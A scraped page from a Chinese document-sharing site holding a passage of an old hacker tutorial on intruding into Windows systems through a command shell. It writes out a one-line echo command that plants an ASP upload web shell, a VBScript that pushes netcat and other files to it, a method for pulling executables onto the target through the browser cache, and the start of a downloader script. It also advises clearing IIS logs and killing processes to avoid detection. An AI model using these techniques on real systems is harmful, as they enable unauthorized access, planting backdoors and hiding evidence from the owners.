- 1、本文档共4页,可阅读全部内容。
- 2、原创力文档(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。
- 3、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载。
- 4、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
- 5、该文档为VIP文档,如果想要下载,成为VIP会员后,下载免费。
- 6、成为VIP后,下载本文档将扣除1次下载权益。下载后,不支持退款、换文档。如有疑问请联系我们。
- 7、成为VIP后,您将拥有八大权益,权益包括:VIP文档下载权益、阅读免打扰、文档格式转换、高级专利检索、专属身份标志、高级客服、多端互通、版权登记。
- 8、VIP文档为合作方或网友上传,每下载1次, 网站将根据用户上传文档的质量评分、类型等,对文档贡献者给予高额补贴、流量扶持。如果你也想贡献VIP文档。上传文档
查看更多
Cmd模式下的入侵技术大全Cmd
Cmd模式下的入侵技术大全Cmd,模式,入侵,技术
2007年05月13日 星期日 13:51前言
Cmd Shell(命令行交互)是黑客永恒的话题.它历史悠久并且长盛不衰.
本文旨在介绍和总结一些在命令行下控制Windows系统的方法.这些方法都是尽可能地利用系统自带的工具实现的.
文件传输
对于溢出漏洞获得的cmd shell.最大的问题就是如何上传文件.由于蠕虫病毒流行.连接ipc$所需要的139或445端口被路由封锁.再加上WinXP系统加强了对ipc$ 的保护.通过ipc$及默认共享上传文件的手段基本无效了.ftp和tftp是两种可行的方法.介于其已被大家熟知.本人就不介绍了.还有三种大家熟悉的办法.作为总结我再提一下:
1.用Echo命令写ASP木马.
前提当然是目标主机上已经安装了IIS.
一般的ASP木马体积较大.不适合直接用echo命令写入文件.这里我提供一个小巧的.
直接给出echo版:
@echo ^%with server.createobject(adodb.stream):.type=1:.open:.write request.binaryread(request.totalbytes):.savetofile server.mappath(request.querystring(s)),2:end with%^ up.asp
注意.只有一行.中间没有回车符.
生成的up.asp不能用浏览器访问.只能用下面这个脚本:
with wscript
if .arguments.count3 then .quit
url=.arguments(0);amp;?s=;amp;.arguments(2)
fn=.arguments(1)
end with
with createobject(adodb.stream)
.type=1:.open:.loadfromfile fn:s=.read:.close
end with
with createobject(microsoft.xmlhttp)
.open post,url,false:.send s
wscript.echo .statustext
end with
将其保存为up.vbs.假设目标IP为9.up.asp在IIS虚拟根目录下.需要上传的文件为nc.exe.上传后保存为mm.exe.相应的命令是:
cscript up.vbs 9/up.asp nc.exe mm.exe
注意.这个命令是在本地命令行中执行的.不要弄错了.另外.通过IIS上传会留日志.要记得清除哦.
2.自动下载到网页缓存中.
例如:start its:/soft/ps.exe
在远程shell中执行上面这个命令后.ps.exe已经下载到目标主机的网页缓存目录中了.然后:
cd C:\Documents and Settings\Default User\Local Settings\Temporary Internet Files\Content.IE5
dir /s ps[1].exe
于是获得ps.exe的具体位置(每台主机都不一样).如:
C:\Documents and Settings\Default User\Local Settings\Temporary Internet Files\Content.IE5\AB094JIT 的目录
2004-01-24 14:24 49,152 ps[1].exe
1 个文件 49,152 字节
最后:
copy AB094JIT\ps[1].exe c:\path\ps.exe
del AB094JIT\ps[1].exe
补充说明:
对于以服务为启动方式的后门所提供的shell.其用户身份一般是System.此时网页缓存目录的位置就如例子中所示.如果shell的身份不是System.需要修改Default User为相应的用户名.
本方法会启动一个IE进程.记得要将它杀掉.如果是System身份的shell.不会在本地出现窗口而暴露.
另外.用ms-its代替its效果完全一样.
3.Echo一个脚本下载web资源.
现成的工具是iGet.vbs.我再给出一个含必要容错功能的版本.
仍然是echo版:
@echo with wscript:if .arguments.count^2 then .quit:end if dl.vbs
@echo set aso=.createobject(adodb.stream):set web=createobject(microsoft.xmlhttp) dl.vbs
@echo web.open get,.arguments(0),0:web.send:if web.
您可能关注的文档
最近下载
- 棉花轻简栽培技术-3.ppt VIP
- 《面向多式联运的可信数据空间建设技术规范》.pdf VIP
- 爆炸和火灾危险环境电力装置设计规范.pdf VIP
- 4大寨沟泥石流治理.ppt VIP
- 六年级数学下册期末综合模拟测试卷(北师版).pdf VIP
- 高速铁路桥隧建筑物修理规则(试行),铁运[2011]131号.pdf VIP
- GBT33399-2016光学功能薄膜聚对苯二甲酸乙二醇醋(PET)薄膜厚度测定方法.pdf VIP
- 民法典买卖合同课件教学.pptx
- 中煤曹庄矿 100MW_200MWh 储能电站示范项目报告表.pdf VIP
- 最全学科带头人教学能手选拔理论试题及答案(教师基本素养试题).doc VIP
文档评论(0)